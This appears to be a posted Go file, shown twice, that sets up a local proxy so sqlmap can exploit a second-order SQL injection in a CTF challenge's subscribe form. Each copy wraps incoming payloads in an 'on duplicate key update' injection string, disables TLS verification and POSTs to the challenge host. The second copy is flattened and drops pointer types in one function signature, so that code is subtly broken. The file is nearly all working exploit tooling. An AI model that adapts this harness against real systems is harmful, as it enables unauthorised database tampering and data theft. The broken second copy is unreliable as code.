fyxme · October 10, 2024 16:07
diff --git a/sqlmap-proxy.go b/sqlmap-proxy.go
 package main

 /*

 Golang proxy example to abuse more complex SQL injections which may not be picked up by sqlmap. For example, SQL injections in CTF challenges

 */

 import (
    "fmt"
    "io/ioutil"
    "log"
    "net/http"
    "net/url"
    "strings"
    "crypto/tls"
    "strconv"
 )

 var postcounter int = 7

 func main() {
    tr := &http.Transport{
        TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
    }
    
    client := &http.Client{Transport: tr}

    cookie := http.Cookie{
        Name: ".AspNetCore.Antiforgery.9TtSrW0hzOs",
        Value: "asdf",
    }
    client.AddCookie(&cookie)

    mux := http.NewServeMux()
    mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
        defer func() { postcounter++ }()
        payload := r.URL.Query().Get("sql")
        log.Println("New payload: [", postcounter, "]", payload)

        resp, err := challenge(client, payload)
        log.Println("> Status code:", resp.StatusCode)
        if err != nil {
            log.Printf("%s\n", err)
            w.WriteHeader(http.StatusInternalServerError)
            return
        }
        body, err := ioutil.ReadAll(resp.Body)
        if err != nil {
            log.Printf("%s\n", err)
            w.WriteHeader(http.StatusInternalServerError)
            return
        }
        w.WriteHeader(resp.StatusCode)
        w.Write(body)
    })
    log.Println("Starting server")
    log.Fatal(http.ListenAndServe(":9001", mux))
 }

 func challenge(client *http.Client, payload string) (*http.Response, error) {
    data := url.Values{}
    data.Set("Email", fmt.Sprintf("\"') on duplicate key update email='%s' -- \"@gmail.com",payload))

    req, err := http.NewRequest("POST", "https://a8abcf35c7416c76ac44587b7b3c5b7f.challenge.somectf.org/Subscribe", strings.NewReader(data.Encode()))

    req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
    req.Header.Add("Content-Length", strconv.Itoa(len(data.Encode())))

    if err != nil {
        return nil, err
    }

    return client.Do(req)
 }
	package main

	/*

	Golang proxy example to abuse more complex SQL injections which may not be picked up by sqlmap. For example, SQL injections in CTF challenges

	*/

	import (
	"fmt"
	"io/ioutil"
	"log"
	"net/http"
	"net/url"
	"strings"
	"crypto/tls"
	"strconv"
	)

	var postcounter int = 7

	func main() {
	tr := &http.Transport{
	TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
	}

	client := &http.Client{Transport: tr}

	cookie := http.Cookie{
	Name: ".AspNetCore.Antiforgery.9TtSrW0hzOs",
	Value: "asdf",
	}
	client.AddCookie(&cookie)

	mux := http.NewServeMux()
	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
	defer func() { postcounter++ }()
	payload := r.URL.Query().Get("sql")
	log.Println("New payload: [", postcounter, "]", payload)

	resp, err := challenge(client, payload)
	log.Println("> Status code:", resp.StatusCode)
	if err != nil {
	log.Printf("%s\n", err)
	w.WriteHeader(http.StatusInternalServerError)
	return
	}
	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
	log.Printf("%s\n", err)
	w.WriteHeader(http.StatusInternalServerError)
	return
	}
	w.WriteHeader(resp.StatusCode)
	w.Write(body)
	})
	log.Println("Starting server")
	log.Fatal(http.ListenAndServe(":9001", mux))
	}

	func challenge(client http.Client, payload string) (http.Response, error) {
	data := url.Values{}
	data.Set("Email", fmt.Sprintf("\"') on duplicate key update email='%s' -- \"@gmail.com",payload))

	req, err := http.NewRequest("POST", "https://a8abcf35c7416c76ac44587b7b3c5b7f.challenge.somectf.org/Subscribe", strings.NewReader(data.Encode()))

	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
	req.Header.Add("Content-Length", strconv.Itoa(len(data.Encode())))

	if err != nil {
	return nil, err
	}

	return client.Do(req)
	}